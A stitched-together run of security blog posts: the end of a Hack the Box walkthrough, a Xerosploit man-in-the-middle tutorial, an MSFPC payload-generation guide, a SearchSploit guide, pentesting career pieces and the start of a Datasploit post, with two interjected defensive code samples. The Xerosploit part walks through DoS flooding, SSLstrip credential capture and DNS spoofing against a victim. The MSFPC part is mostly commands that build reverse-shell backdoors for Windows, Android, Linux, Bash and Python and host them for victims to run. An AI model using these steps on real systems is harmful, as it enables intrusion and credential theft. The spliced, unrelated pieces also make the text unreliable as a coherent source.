As we can see, we are now running as the privileged Windows user NT AUTHORITY\SYSTEM.

We have found root.txt at the path C:\Users\Administrator\Desktop.

Wonderful!! We have completed both tasks and hacked this box.
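The root cause exploited above is an upload filter that blocked some extensions but still accepted a filename IIS treats as executable configuration. As an added example, not code from the walkthrough or from the Bounty machine, here is the allow-list style check a defender would put on such an upload handler; the function names, extension list and sample filenames are my own assumptions.

```python
"""Added example: filename validation for an upload handler that would have
rejected the web.config trick used on Bounty.  Function names, the extension
allow-list and the sample names below are constructed for this example.

Rules a defender wants on a web-served upload directory:
  1. allow-list extensions, never deny-list them;
  2. reject server configuration filenames by name (web.config for IIS,
     .htaccess/.htpasswd for Apache), since the server *executes* them;
  3. reject double extensions, path separators and control characters;
  4. never store the file under the client-supplied name.
"""
import os
import re
import secrets

ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "pdf"}
SERVER_CONFIG_NAMES = {"web.config", ".htaccess", ".htpasswd"}
CONTROL_CHARS = re.compile(r"[\x00-\x1f]")


class UploadRejected(ValueError):
    """Raised when a client-supplied filename fails the allow-list check."""


def safe_upload_name(client_name: str) -> str:
    """Return a server-generated filename for the upload, or raise UploadRejected."""
    # Drop any directory part the client sent ("../", "C:\\...").
    base = os.path.basename(client_name.replace("\\", "/")).strip()
    if not base or base in {".", ".."}:
        raise UploadRejected("empty filename")
    if base.lower() in SERVER_CONFIG_NAMES:
        raise UploadRejected("server configuration filename")
    if CONTROL_CHARS.search(base):
        raise UploadRejected("control character in filename")
    # Exactly one extension: "shell.aspx.jpg", "shell.aspx." and
    # "shell.aspx:.jpg" all split into more than two parts and are rejected.
    parts = base.split(".")
    if len(parts) != 2 or not parts[0]:
        raise UploadRejected("filename must be name.ext with a single extension")
    ext = parts[1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        raise UploadRejected(f"extension .{ext} not allowed")
    # Keep only the vetted extension; the stored name is random, not the client's.
    return f"{secrets.token_hex(16)}.{ext}"


def is_allowed(client_name: str) -> bool:
    """Convenience wrapper: True if the name passes, False if it is rejected."""
    try:
        safe_upload_name(client_name)
        return True
    except UploadRejected:
        return False


if __name__ == "__main__":
    # Constructed sample names, including the ones that matter on IIS.
    for name in ["photo.png", "report.PDF", "web.config", "WEB.CONFIG",
                 "shell.aspx", "shell.aspx.jpg", "../shell.aspx", ".htaccess"]:
        try:
            print(f"{name!r:20} -> stored as {safe_upload_name(name)}")
        except UploadRejected as why:
            print(f"{name!r:20} -> rejected ({why})")
```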

Happy Hacking!!!!

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, and a lover of social media and gadgets.

The post Hack the Box: Bounty Walkthrough appeared first on Hacking Articles.

Xerosploit- A Man-In-The-Middle Attack Framework

The network is an important area for an ethical hacker to check, as many threats can come from the internal network: network sniffing, ARP spoofing, MITM, etc. This article is on Xerosploit, which performs advanced MITM attacks on your local network to sniff packets, steal passwords and more.

Table of Content

  • Introduction to Xerosploit
  • Man-In-The-Middle
  • Xerosploit Installation
  • PSCAN (Port Scanner)
  • DOS (Denial of service)
  • INJECTHTML (HTML INJECTION)
  • SNIFF
  • dspoof
  • YPLAY
  • REPLACE
  • Driftnet

Introduction to Xerosploit

Xerosploit is a penetration testing toolkit whose goal is to perform man-in-the-middle attacks for testing purposes. It brings various modules that allow efficient attacks to be carried out, and also allows denial of service attacks and port scanning. It is powered by bettercap and nmap.

For those not familiar with the man-in-the-middle attack, welcome to the world of internal network attacks.

Dependencies

  • nmap
  • hping3
  • build-essential
  • ruby-dev
  • libpcap-dev
  • libgmp3-dev
  • tabulate
  • terminaltables

Features:

  • Port scanning
  • Network mapping
  • DoS attack
  • HTML code injection
  • JavaScript code injection
  • Download interception and replacement
  • Sniffing
  • DNS spoofing
  • Background audio reproduction
  • Image replacement
  • Driftnet
  • Webpage defacement and more

Man-In-The-Middle

A man-in-the-middle attack (MITM) is an attack where the attacker secretly relays and possibly alters the communication between two parties who believe they are directly communicating with each other. There are many open source tools available online for this attack, such as Ettercap, MITMf and Xerosploit.

From Wikipedia.org

Xerosploit Installation

Xerosploit is a MITM attack tool that runs only on Linux. To install it, follow these simple steps.

Open a terminal and type:

git clone https://github.com/LionSec/xerosploit.git
cd xerosploit
./install.py

It will ask you to choose your operating system; here we pressed 1 for Kali Linux.

On start-up it displays your network configuration, including IP address, MAC address, gateway, interface and host name. Now run the following command in the Xerosploit console to see the initial commands:

help

This grid lists the commands available for our attack. Since we are going for a man-in-the-middle attack, I will choose the scan command in my next step to scan the whole network.

scan

This command scans the complete network and finds all devices on it.

As you can observe, it has scanned all the active hosts. There are many hosts in this network; you have to choose your target from the results. I am going to select 192.168.1.105 for the man-in-the-middle attack.

192.168.1.105

Next it will ask which module you want to load for the man-in-the-middle attack. Type help to list them.

help

pscan (Port Scanner)

Let’s begin with pscan, the port scanner. It shows all the open ports on the target computer and retrieves the versions of the programs running on the detected ports. Type run to execute pscan and it will show you all the open ports of the victim.

pscan

DOS (Denial of service)

Type “dos” to load the module. It sends a succession of TCP SYN packets to the target system to make the machine unresponsive to legitimate traffic; in other words, it performs a SYN flood attack.

dos
run

Press Ctrl+C to stop.

If you are familiar with the hping tool you will notice that this module uses the hping3 command under the hood to send a flood of SYN packets.

Inject HTML (HTML Injection)

HTML injection is a website vulnerability that occurs when user input is not correctly sanitized or output is not encoded, so that an attacker is able to inject valid HTML code into a vulnerable web page. Many techniques exist that use elements and attributes to submit HTML content.

So here we will replace the victim’s HTML page with ours. Select any page of your choice; you will notice that I have written “You have been hacked” in my index.html page, which will replace the victim’s HTML page. Whatever page the victim tries to open, he/she will see only the replaced one.

First create a page like mine and save it on the Desktop as INDEX.html.

Now run the injecthtml command to load the injecthtml module, then type run to execute it and enter the path where you saved the file.

Bravo! We have successfully replaced the page as you can see in the picture below.

Hit Ctrl+C to stop the attack.

Sniff

Now run the following module to sniff all the traffic of the victim with command:

sniff

Then enter the following command to execute that module:

run

Now it will ask whether you want to use SSLstrip to downgrade HTTPS URLs to HTTP so that login credentials can be captured in clear text. Enter y.

When the victim enters a username and password, the module sniffs and captures the data.

It opens a separate terminal in which we can see the credentials in clear text. As you can see, it has successfully captured the login credentials.

Hit Ctrl+C to stop the attack.

dspoof

This loads the dspoof module, which supplies false DNS answers for all hosts the target browses to, redirecting all HTTP traffic to one specified IP.

Now type run to execute the module; it will ask for the IP address to which you want to redirect the traffic. Here we gave our Kali Linux IP.

Now, as soon as the victim opens any web page, he/she gets the page stored in our web directory that we want to show, as in the picture below.

Hit Ctrl+C to stop the attack.

Yplay

Now let’s look at another interesting module, yplay. It plays the audio of a video of your choice in the background of the victim’s browser. First execute the yplay command followed by run, then give the ID of the video you selected.

Open your browser and choose a YouTube video you want to play in the background of the victim’s browser. If the video has an advertisement, skip it, then copy the ID from the URL. Come back to Xerosploit.

yplay

To execute the yplay module, type run.

run

In the next step, enter the YouTube video ID you copied from the URL.

febVHEarpeQ

Now, no matter what the victim is doing on the laptop, whenever he/she opens any web page, he/she will hear in the background the song we want him/her to listen to.

Hit Ctrl+C to stop the attack.

Replace

I hope all the attacks were quite interesting, but the next one is going to be amazing. Now we will replace all the images on the victim’s website with our image. First execute the replace command followed by run. Don’t forget to give the path of the .png file you have created as a surprise for the victim.

replace
run
/root/Desktop/1.png

As the victim opens any URL, he/she will be amazed to see the images on the website replaced, as shown here.

Hit Ctrl+C to stop the attack.

Driftnet

We will use the driftnet module to capture all the images the victim views on the web, with the following commands. It saves all captured pictures in opt/xerosploit/xedriftnet.

driftnet
run

Once the attack is launched, we can see on our screen all the images the victim is viewing on his/her computer. We can do much more with this tool; for instance, with the move module you can shake the browser contents.

As you can observe, all the images the victim views on his/her system are captured on your system.

Needless to say, Xerosploit is an interesting and useful tool for performing so many attacks. I hope readers will like this.
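Every module above depends on first inserting Xerosploit between the victim and the gateway, which bettercap-based tools do by ARP spoofing. As an added example that is not part of this article or of Xerosploit, and assuming the MITM is established that way, here is detection logic a network defender can run over observed ARP replies (for example from a SPAN port) to spot the poisoning while the sniff or dspoof modules are active; the sample replies, addresses and thresholds are constructed for the example.

```python
"""Added example: detect ARP-cache poisoning of the kind a bettercap-based MITM
tool uses.  Input is a sequence of ARP replies as (timestamp_seconds, sender_ip,
sender_mac); everything below (addresses, thresholds, sample data) is constructed.

Two rules:
  1. an IP that was bound to one MAC is suddenly claimed by a different MAC;
  2. one MAC claims more than `max_ips_per_mac` IPs inside `window_seconds`
     (the attacker answering for both the gateway and the victim).
Rule 1 also fires on legitimate DHCP re-leases or a replaced NIC, and rule 2 on
proxy-ARP routers, so tune the threshold or allow-list such MACs before alerting.
"""
from collections import defaultdict

# Constructed capture: 192.168.1.1 is the real gateway (aa:bb:cc:00:00:01),
# 192.168.1.105 is the victim; at t=30 a third MAC starts answering for both.
SAMPLE_ARP_REPLIES = [
    (0.0,  "192.168.1.1",   "aa:bb:cc:00:00:01"),
    (0.5,  "192.168.1.105", "aa:bb:cc:00:01:05"),
    (10.0, "192.168.1.1",   "aa:bb:cc:00:00:01"),
    (30.2, "192.168.1.1",   "00:0c:29:aa:bb:ee"),  # poisons the victim's view of the gateway
    (30.3, "192.168.1.105", "00:0c:29:aa:bb:ee"),  # poisons the gateway's view of the victim
]


class ArpSpoofDetector:
    def __init__(self, window_seconds=60.0, max_ips_per_mac=1):
        self.bindings = {}               # ip -> mac first seen for that ip
        self.claims = defaultdict(dict)  # mac -> {ip: last timestamp it was claimed}
        self.window = window_seconds
        self.max_ips = max_ips_per_mac

    def observe(self, ts, ip, mac):
        """Record one ARP reply; return a list of alert strings (possibly empty)."""
        alerts = []
        mac = mac.lower()

        # Rule 1: binding change for an IP we already know.
        known = self.bindings.get(ip)
        if known is None:
            self.bindings[ip] = mac
        elif known != mac:
            alerts.append(f"IP {ip} changed from {known} to {mac} at t={ts}")

        # Rule 2: one MAC claiming several IPs within the window.
        self.claims[mac][ip] = ts
        recent = sorted(i for i, t in self.claims[mac].items() if ts - t <= self.window)
        if len(recent) > self.max_ips:
            alerts.append(f"MAC {mac} claims {recent} within {self.window}s at t={ts}")
        return alerts


def scan(replies, **detector_kwargs):
    """Run the detector over a whole capture and return all alerts in order."""
    detector = ArpSpoofDetector(**detector_kwargs)
    alerts = []
    for ts, ip, mac in replies:
        alerts.extend(detector.observe(ts, ip, mac))
    return alerts


if __name__ == "__main__":
    for line in scan(SAMPLE_ARP_REPLIES):
        print("ALERT:", line)
```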

HaPpY hAcKing!!

Author: Geet Madan is a Certified Ethical Hacker, Researcher and Technical Writer at Hacking Articles on Information Security.

The post Xerosploit- A Man-In-The-Middle Attack Framework appeared first on Hacking Articles.

Comprehensive Guide on MSFPC

Hello Friends!!

As you all know, msfvenom is the Kali Linux tool for generating payloads. It is also available wrapped as MSFvenom Payload Creator (MSFPC), which generates various “basic” Meterpreter payloads via msfvenom. Fully automating msfvenom and Metasploit is its end goal.

MSFvenom Payload Creator (MSFPC) is a wrapper that generates multiple types of payloads based on the user’s choice. The idea is to be as simple as possible (only requiring one input) to produce a payload.

Source: https://github.com/g0tmi1k/mpc

Author: g0tmi1k

Syntax

msfpc <TYPE> (<DOMAIN/IP>) (<PORT>) (<CMD/MSF>) (<BIND/REVERSE>) (<STAGED/STAGELESS>) (<TCP/HTTP/HTTPS/FIND_PORT>) (<BATCH/LOOP>) (<VERBOSE>)

Create a Payload with Interactive IP Mode

Let’s create a payload for the Windows platform with the following command:

msfpc windows

When you enter the above command it will ask you to confirm the interface:

Which interface should be used?

eth0, lo wan

We press 1 for eth0. It then starts generating the payload and gives us the following as a result:

  1. Location of the MSF handler file and the Windows meterpreter payload created.
  2. Command to run to start multi/handler automatically within the Metasploit framework.
  3. Command for file transfer through a web server.

Basically, msfpc is designed to reduce the user’s effort in generating payloads for various platforms in different file formats. When you type “msfpc” it displays all supported platform types, and it generates the file format appropriate to each.

Syntax: msfpc <platform-type> <Lhost IP> <Lport>

Windows Payload

If you want to generate a payload that gives a meterpreter session on a victim machine running Windows, all you need to do is type the following:

msfpc windows 192.168.1.109 1234

If you do not mention an IP, it will ask you to choose an interface as discussed above, and it uses 443 as the default lport. It creates a malicious backdoor in .exe format for the 32-bit architecture. It then generates the payload and gives us the following details:

  • Location of the MSF handler file and Windows meterpreter payload created: ‘/root/windows-meterpreter-staged-reverse-tcp-1234.exe’
  • Command to run to start multi/handler automatically: msfconsole -q -r ‘/root/windows-meterpreter-staged-reverse-tcp-1234-exe.rc’
  • Command for file transfer through a web server: python2 -m SimpleHTTPServer 8080

Now run the following commands to launch multi/handler and the web server for file transfer.

msfconsole -q -r '/root/windows-meterpreter-staged-reverse-tcp-1234-exe.rc'
python2 -m SimpleHTTPServer 8080

When the victim browses the following URL, they are prompted to download the .exe file; running it provides a meterpreter session to the attacker.

http://192.168.1.109/root/windows-meterpreter-staged-reverse-tcp-1234.exe

Conclusion: Earlier, attackers used the manual method of generating a payload via the msfvenom command and then using the Metasploit module “multi/handler” to receive the reverse connection as a meterpreter session. This approach was quite successful at compromising a victim’s machine, although it took a lot of time. The same approach applies with MSFPC, which generates the various “basic” Meterpreter payloads via msfvenom for you.

Android Payload

If you want to generate a payload that gives a meterpreter session on a victim machine running Android, all you need to do is type the following:

msfpc apk 192.168.1.109 1234

It creates a malicious backdoor in .apk format. It then generates the payload and gives us the following details:

  • Location of the MSF handler file and Android meterpreter payload created: ‘/root/android-meterpreter-stageless-reverse-tcp-1234.apk’
  • Command to run to start multi/handler automatically: msfconsole -q -r ‘/root/android-meterpreter-stageless-reverse-tcp-1234.apk.rc’
  • Command for file transfer through a web server: python2 -m SimpleHTTPServer 8080

Now run the following commands to launch multi/handler and the web server for file transfer.

msfconsole -q -r '/root/android-meterpreter-stageless-reverse-tcp-1234.apk.rc'
python2 -m SimpleHTTPServer 8080

When the victim browses the following URL, they are prompted to install the application; running the .apk provides a meterpreter session to the attacker.

http://192.168.1.109/root/android-meterpreter-stageless-reverse-tcp-1234.apk

Hence, as said above, you can observe that we have a meterpreter session on the target’s machine.

BASH

The advantage of MSFPC is that it removes the need to remember the format for each platform; all we need to do is follow the syntax declared above and the rest is managed by MSFPC automatically. Suppose I want to create a payload for the Bash platform: it takes MSFPC only a few moments to generate a bash payload.

msfpc bash 192.168.1.109 1234

It creates a malicious backdoor in .sh format. It then generates the payload and gives us the following:

  • Location of the MSF handler file and bash shell payload created: ‘/root/bash-shell-staged-reverse-tcp-1234.sh’
  • Command to run to start multi/handler automatically: msfconsole -q -r ‘/root/bash-shell-staged-reverse-tcp-1234.sh.rc’
  • Command for file transfer through a web server: python2 -m SimpleHTTPServer 8080

Now run the following commands to launch multi/handler and the web server for file transfer.

msfconsole -q -r '/root/bash-shell-staged-reverse-tcp-1234.sh.rc'
python2 -m SimpleHTTPServer 8080

When the victim browses the following URL, they are prompted to save the script; once the target runs the bash script with execute permission, it gives a command shell.

http://192.168.1.109/root/bash-shell-staged-reverse-tcp-1234.sh
chmod 777 bash-shell-staged-reverse-tcp-1234.sh
./bash-shell-staged-reverse-tcp-1234.sh

Hence, as said above, you can observe that we have a command shell on the target’s machine, and with the following command we upgrade it to a meterpreter shell.

sessions -u 1

Linux

If you want to generate a payload that gives a meterpreter session on a victim machine running Linux, all you need to do is type the following:

msfpc linux 192.168.1.109 4444

It creates a malicious backdoor in .elf format. It then generates the payload and gives us the following details:

  • Location of the MSF handler file and Linux shell payload created: ‘/root/linux-shell-staged-reverse-tcp-4444.elf’
  • Command to run to start multi/handler automatically: msfconsole -q -r ‘/root/linux-shell-staged-reverse-tcp-4444.elf.rc’
  • Command for file transfer through a web server: python2 -m SimpleHTTPServer 8080

Now run the following commands to launch multi/handler and the web server for file transfer.

msfconsole -q -r '/root/linux-shell-staged-reverse-tcp-4444.elf.rc'
python2 -m SimpleHTTPServer 8080

When the victim browses the following URL, they are prompted to save the file; once the target runs the .elf file with execute permission, it gives a command shell.

http://192.168.1.109/root/linux-shell-staged-reverse-tcp-4444.elf
chmod 777 linux-shell-staged-reverse-tcp-4444.elf
./linux-shell-staged-reverse-tcp-4444.elf

Hence, as said above, you can observe that we have a command shell on the target’s machine, and with the following command we upgrade it to a meterpreter shell.

sessions -u 1

Python

If you want to generate a payload that gives a meterpreter session on a victim machine that has Python available, all you need to do is type the following:

msfpc python 192.168.1.109 5555

It creates a malicious backdoor in .py format. It then generates the payload and gives us the following details:

  • Location of the MSF handler file and Python meterpreter payload created: ‘/root/python-meterpreter-staged-reverse_tcp-5555.py’
  • Command to run to start multi/handler automatically: msfconsole -q -r ‘/root/python-meterpreter-staged-reverse_tcp-5555.py.rc’
  • Command for file transfer through a web server: python2 -m SimpleHTTPServer 8080

Now run the following commands to launch multi/handler and the web server for file transfer.

msfconsole -q -r '/root/python-meterpreter-staged-reverse_tcp-5555.py.rc'
python2 -m SimpleHTTPServer 8080

When the victim browses the following URL, they are prompted to save the script; once the target runs the Python script, it gives a meterpreter session.

http://192.168.1.109/root/python-meterpreter-staged-reverse_tcp-5555.py
python python-meterpreter-staged-reverse_tcp-5555.py

Hence, as said above, you can observe that we have a meterpreter session on the target’s machine.

Batch (Generates all Possible Combination Payloads)

Batch is the most significant mode, as it generates as many payload combinations as possible. If we want to create all payloads that can give a meterpreter session, we can use the following command.

msfpc msf batch eth0

In the output below you can observe that it has generated every possible type of payload that can give a meterpreter session. The rest of the technique for executing the payload and getting the reverse connection is as above.

If we want to create all payloads that can give a command shell session on the target’s machine, we can use the following command.

msfpc cmd batch eth0

In the output below you can observe that it has generated every possible type of payload that can give a command shell.

Loop (Generates One payload for Each Platform)

Loop is also a significant mode, as it generates one of each type of payload with its default values. Hence by default it will generate payloads that provide a meterpreter session rather than a command shell session.

msfpc verbose loop eth0

In the output below you can observe that it has generated one payload for each platform, each of which can give a meterpreter session. The rest of the technique for executing the payload and getting the reverse connection is as above.

Generating Stageless Payload

As we all know, there are two types of payloads, staged and stageless, and by default msfpc creates a staged payload. If you want a stageless payload, use the following commands to generate one for a command shell session or a meterpreter session respectively.

msfpc stageless cmd windows 192.168.1.109
msfpc stageless msf windows 192.168.1.109

The rest of the technique for executing the payload and getting the reverse connection is as above.

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, and a lover of social media and gadgets.

The post Comprehensive Guide on MSFPC appeared first on Hacking Articles.

Comprehensive Guide on SearchSploit

Hello friends!! Several times you may have read our articles on CTF challenges and other topics where we used searchsploit to find out whether an exploit is available in its database. In this article we are going to discuss searchsploit in detail.

Table of Content

  • Introduction to searchsploit
  • Title Searching
  • Advance Title Searching
  • Copy To Clipboard
  • Copy To Directory
  • Examine an Exploit
  • Examining Nmap result
  • Exploit-DB Online
  • Eliminate Unwanted Results
  • Case Sensitive

Introduction to SearchSploit

Included in the Exploit Database repository on GitHub is “searchsploit”, a command line search tool for Exploit-DB that also allows you to take a copy of Exploit Database with you, everywhere you go. SearchSploit gives you the power to perform detailed off-line searches through your locally checked-out copy of the repository. This capability is particularly useful for security assessments on segregated or air-gapped networks without Internet access.

Since we are using the GNOME build of Kali Linux, the “exploitdb” package is already included by default. All we need to do is open a terminal, type “searchsploit” and press Enter. You will be welcomed by its help screen.

Source: https://www.exploit-db.com/searchsploit/

Title Searching

The -t option enables the “title” parameter, which searches for exploits by their title only. By default, searchsploit matches against both the title of the exploit and its path, so searching by title gives quicker and tidier results.

Syntax: searchsploit [option] <title>

searchsploit -t java

The above command searches for exploits related to the Java platform and shows all matching exploits available in the Exploit-DB database.

Advance Title Searching

You can also use the -t option with several terms to narrow the results to a particular platform. For example, if you want to find Java exploits for the Windows platform, consider the following command.

searchsploit -t java windows

Now you can compare this output with the previous result.

Copy To Clipboard

The -p option enables the “copy to clipboard” parameter. It shows more information about the exploit and copies the full path of the exploit to the clipboard; all you need to do is press Ctrl+V to paste it.

searchsploit 39166
searchsploit -p 39166

The following image shows how the result differs from the default when the -p option is used.

Copy To Directory

The -m option enables the “copy to directory/folder” parameter. It shows the same information about the exploit as above and copies the exploit into your current working directory.

searchsploit 39166
searchsploit -m 39166

The following image shows how the result differs from the default when the -m option is used.

Examine an Exploit

The --examine option opens the exploit with $PAGER so you can read through its functionality.

searchsploit 39166 --examine

The above command will open the text file of the exploit to review its functionality, code and other information.

Examining Nmap result

As we all know, Nmap has a very useful feature that lets you save its results in XML format, and searchsploit can look up the exploits associated with each service in that XML file.

nmap -sV 192.168.1.102 -oX result.xml

With the above command we have saved the Nmap scan result in an XML file, so that we can search for exploits related to the scanned ports and services.

The -x option enables the examine parameter, and the --nmap option checks every result in Nmap’s XML output, using the detected service version, to find related exploits.

searchsploit -x --nmap result.xml

Here you can observe that it examines the XML file in verbose mode and shows all possible exploits for the running services.

Exploit-DB Online

The -w option shows the website URL for each result. On the Exploit-DB website you get more detailed information, such as the CVE ID, setup files, tags and vulnerability mappings, which is not included in searchsploit.

searchsploit ubuntu 14.04 -w

The above command shows the Exploit-DB website links for all exploits related to Ubuntu 14.04.

Eliminate Unwanted Results

The --exclude option removes unwanted results from the list of exploits. You can remove several terms by separating them with a “|” (pipe). Compare the following:

searchsploit ubuntu 14.04
searchsploit ubuntu 14.04 --exclude="Privilege Escalation"

The following image shows how the result differs from the default when the --exclude option is used. You can eliminate more terms with the help of the “|” (pipe):

searchsploit ubuntu 14.04 --exclude="Privilege Escalation|(PoC)"

Moreover, we can use the universal grep command to filter unwanted results out of its output. Compare the following:

searchsploit ubuntu 14.04
searchsploit ubuntu 14.04 | grep "Buffer Overflow"

The second command only shows the Ubuntu 14.04 exploits whose entry contains “Buffer Overflow”.

Case Sensitive

The -c option enables a “case-sensitive” search, matching only the exact characters given in the command; by default the search is case-insensitive. Consider the following example:

searchsploit xss
searchsploit -c XSS

As you can observe, by default it shows all available exploits matching xss or XSS, but the second command shows results only for XSS.

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, and a lover of social media and gadgets.

The post Comprehensive Guide on SearchSploit appeared first on Hacking Articles.

Pentesters: Employment Options & Salaries

Are you a professional pentester or aspiring to become one? Penetration testing is a skill-based role, and the more skills and practical experience you have, the more your value will increase. Here are some of the employment options and salaries for professional penetration testers.

Employment Options of Penetration Testers

Freelance 

IT Security freelancers get paid by the project and directly by companies requesting their services. As a freelancer, you can offer any service a company may need, from simple penetration tests to consulting on their entire security strategy.

One common path for professional penetration testers is bug hunting. Not only will your existing skills help you be good at it, but you also have the choice to hunt for bugs in your free time or in a more full-time manner. Note that revenue is not guaranteed: bug hunters usually get paid based on the vulnerability type and severity. There are numerous online platforms to help you find the right gig; some that offer freelance gigs for experienced professionals are Bugcrowd and HackerOne.

Find out how to use your pentesting skills to make extra bucks as a Bug Hunter here.

IT Security Service Company 

Here, you work with a company as a third-party contractor providing a service. Clients can request a wide range of services, from basic vulnerability assessments to incident handling and response after a breach. Some of the services corporations frequently ask for are:

  • Mapping of their organization’s IT infrastructure
  • Implementing the right cybersecurity strategy for their company
  • Performing pentests on their systems, networks, mobile or web applications, etc.
  • Hunting for vulnerabilities in their infrastructure, applications, etc.
  • Incident handling and/or response after a data breach

The range of requests is practically unlimited and depends on the organization asking, so professionals working with IT security service companies must have extensive knowledge.

In-house Employee 

When working ‘In-House’, you are directly hired by the company as a part of the IT Security department. Depending on your job role, you might be in charge of monitoring computer networks for security issues, simulating cyber attacks in order to identify and report security flaws, operating software to protect systems and information infrastructure, investigating security breaches and other incidents, and much more…

As an in-house employee, you do not have external clients. Your client is the company you work for.

How Much Does a Penetration Tester Earn?

Standard penetration tests can range from $4,000 up to $15,000 when performed by a renowned service company. As a freelancer, you can choose to get paid either per hour of service or per project. The cost depends on the size and scope of the penetration test, so make sure to read all the details before agreeing to a freelance gig.

According to Glassdoor, in-house penetration testers in the US can earn between $49K and $109K per year. Depending on your specialization, expertise, and experience, it can be much more. The highest paying skills associated with this job deal with network security management, web security & encryption, and security testing & auditing.

Read more about the skills next-level IT Security professionals should have here.

With more malware created in just a few hours than in the entire 20th century, corporations are on high alert to keep their data and that of their customers secure. For this reason, more and more organizations find themselves searching for temporary workers to help with their extra security needs, and professionals turn to different employment options, either full-time or as a side hustle.

Find out everything you need to know to keep your company secure and become a professional pentester with the PTP training course.

Source: Prospects | Business Insider


Connect with us on Social Media:

Twitter | Facebook | LinkedIn | Instagram

#CyberAware – 4 FAQs on Penetration Testing

Penetration testing is one of the best practices to ensure a company's infrastructure is secure from bad actors trying to get their hands on confidential information. On the occasion of this year's National Cybersecurity Awareness Month (NCSAM), #CyberAware, we want to discuss 4 of the most frequently asked questions about penetration testing.

What is the difference between a Vulnerability Assessment and a Penetration Test?

A vulnerability assessment is aimed at identifying known vulnerabilities in an organization’s infrastructure. This is helpful for establishing whether or not the company’s security measures are working. However, one does not actually exploit the vulnerabilities identified or consider the overall security management processes.

A penetration test (or pentest), on the other hand, evaluates the security of assets by running a series of planned attacks with the goal of finding and exploiting vulnerabilities. It is intended to be much more in depth, and a specific methodology must be respected.

In other words, the vulnerability assessment is a part of the penetration testing process, but the actual exploitation happens in the next phase of the penetration testing cycle. Penetration testing is a more complete process, and goes as follows:

  • Information Gathering
  • Footprinting & Scanning
  • Vulnerability Assessment
  • Exploitation
  • Reporting

What are the different Types of Penetration Tests?

A penetration tester, much like an experienced ethical hacker, performs deep investigations of a remote system's security flaws and tests for all vulnerabilities, not just the ones that may grant them root access. Penetration testing is not about getting root. Some of the most common forms of penetration tests are:

  • Web Application penetration tests — typically to find a company’s technical vulnerabilities.
  • Infrastructure penetration tests — examines servers, firewalls and other hardware for security vulnerabilities.
  • Wireless penetration tests — attempts to locate access points and weak encryption algorithms.
  • Social engineering (simulated phishing) penetration tests — provides an independent assessment of employee susceptibility to phishing attacks.
  • Mobile application penetration tests — aims at finding a company’s technical vulnerabilities on mobile apps.

Learn more about web application pentesting, mobile application pentesting and network pentesting here.

What should be included in a Penetration Test Report?

Any thorough and professional penetration testing report should provide a detailed breakdown of your findings in an easily interpreted format. It is your way of officially delivering and communicating the results of your tests with executives, IT staff, and the development team, so you have to remember to talk in a manner that non-security teams understand.

A next-level report should include the following:

  • The techniques used
  • The vulnerabilities found
  • All of the exploits used
  • The impact & risk analysis for each vulnerability
  • Possible remediation plan

Hint: Targeted tips on how to effectively remediate each vulnerability are the real value for the client.

What are the Limitations of Penetration Testing?

Undertaking a series of penetration tests is a useful practice that will help strengthen an organization's security, but such tests have their limitations. For example:

  • Limitations of scope
  • Limitations of time
  • Limitations on access
  • Limitations on methods

Read more about the different penetration testing limitations here.

Source: PTS Training Course | IT Governance

Learn networking and programming skills up to the most important basics of penetration testing with the Penetration Testing Student (PTS) training course.


5 Ways Pentesters Can Earn Extra Revenue [Infographics]

Do you have an expensive project, want to earn big bucks or feel like taking on a new challenge? As a professional penetration tester, there are many things you can do to earn extra income. Whether you want to explore new opportunities or need the extra cash, here are 5 side-hustles to consider.


With very little time to adapt to new techniques and a fast-paced threat landscape, security professionals are busy trying to keep the internet secure while staying up-to-date on a regular basis. Still got some free time to take on an extra challenge? Feel free to try out one of these options, as it will surely boost your skills and ultimately enrich your career. If you decide to go for it, make sure to come back to us with details of your successes. We’d love to hear the stories you have to share!

Aspiring to become a professional penetration tester? Learn modern pentesting techniques with the penetration testing professional (PTP) training course.

Sources: NIST | Freelancer | Glassdoor | Dark Reading | Sokanu | Security Intelligence


Top 5 Skills for a Career in Digital Forensics

Digital forensics is the field where technology meets criminal justice. Professionals in this field use their InfoSec skills to recover data and analyze information from devices (such as computers, USB drives, phones, etc.) to solve a wide range of crimes and take down criminals. Interested in building your career around digital forensics? Here are some skills you will need to succeed in this field.

1. Analytical Talent

Just as in any investigative role, digital forensics professionals need to have analytical skills. You’ll be required to piece together information to solve a case, so analytical thinking might just come in handy sooner than later.

2. Tech Fundamentals

Since digital forensics is a technical field, it helps to have a solid computer science background. Some of the prerequisite skills we suggest are a strong understanding of the fundamentals of modern operating systems and at least a basic understanding of networks, network protocols, and programming languages.

3. IT Security Practical Know-How

While it's a good start to have theoretical knowledge, you will also need practical skills to solve crimes in real life. Even better is knowing how to prevent such incidents from happening in the first place. This skill will make you a valuable team member. The perfect candidate for a digital forensics role will not only have experience working in general IT, but also specifically in security.

4. Communication Skills

Whether you work with a team or as a consultant after a breach, the people you work for will need to understand what happened. Good communication skills are crucial. In the same way penetration testers are expected to create professional reports of their findings, digital forensics investigators need to be able to explain in terms that the rest of the team understands.

5. Desire to Learn

With new threats appearing every day, it's no surprise that professionals in this field need to stay up to date. With a desire to learn new skills and techniques, you can only succeed as a Digital Forensics Investigator or, at the very least, be a valuable asset to the team.

With security professionals in high demand and many jobs going unfilled, the future for anyone with these skills is very bright indeed. Add to that the fact that the average Digital Forensic Investigator salary is over $70,000 a year (according to PayScale.com) with the top earners making well into 6 figures, it’s a great paying career to boot (pun intended).

Source: Forbes

Curious about Digital Forensics? Learn how to investigate cyber intrusions and assist in cases of incident response with the Digital Forensics Professional (DFP) training course.


Toolsmith #127: OSINT with Datasploit

I was reading an interesting Motherboard article, Legal Hacking Tools Can Be Useful for Journalists, Too, that includes reference to one of my all time OSINT favorites, Maltego. Joseph Cox's article also mentions Datasploit, a 2016 favorite for fellow tools aficionado, Toolswatch.org, see 2016 Top Security Tools as Voted by ToolsWatch.org Readers. Having not yet explored Datasploit myself, this proved to be a grand case of "no time like the present."
Datasploit is "an #OSINT Framework to perform various recon techniques, aggregate all the raw data, and give data in multiple formats." More specifically, as stated on the Datasploit documentation page under Why Datasploit, it utilizes various Open Source Intelligence (OSINT) tools and techniques found to be effective, and brings them together to correlate the raw data captured, providing the user relevant information about domains, email addresses, phone numbers, person data, etc. Datasploit is useful for collecting relevant information about a target in order to expand your attack and defense surface very quickly.
The feature list includes:
  • Automated OSINT on domain / email / username / phone for relevant information from different sources
